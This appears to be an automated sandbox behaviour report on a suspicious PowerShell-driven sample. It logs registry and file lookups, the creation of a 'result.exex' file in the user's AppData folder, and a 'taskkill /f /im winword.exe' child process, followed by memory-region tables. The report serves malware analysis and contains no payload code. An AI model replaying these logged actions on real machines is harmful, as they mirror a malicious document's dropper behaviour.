| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
21 | |
| Environment | Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\result.exex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\taskkill.exe |
| Command Line | "C:\Windows\system32\taskkill.exe" /f /im winword.exe |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:13 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x5f4 |
| Parent PID | 0x2ac (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD0
0x
B10
0x
5F8
0x
B38
0x
B34
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000060000 | 0x00060000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00170000 | 0x00173fff | Memory Mapped File | Readable, Writable |
|
|
|
|
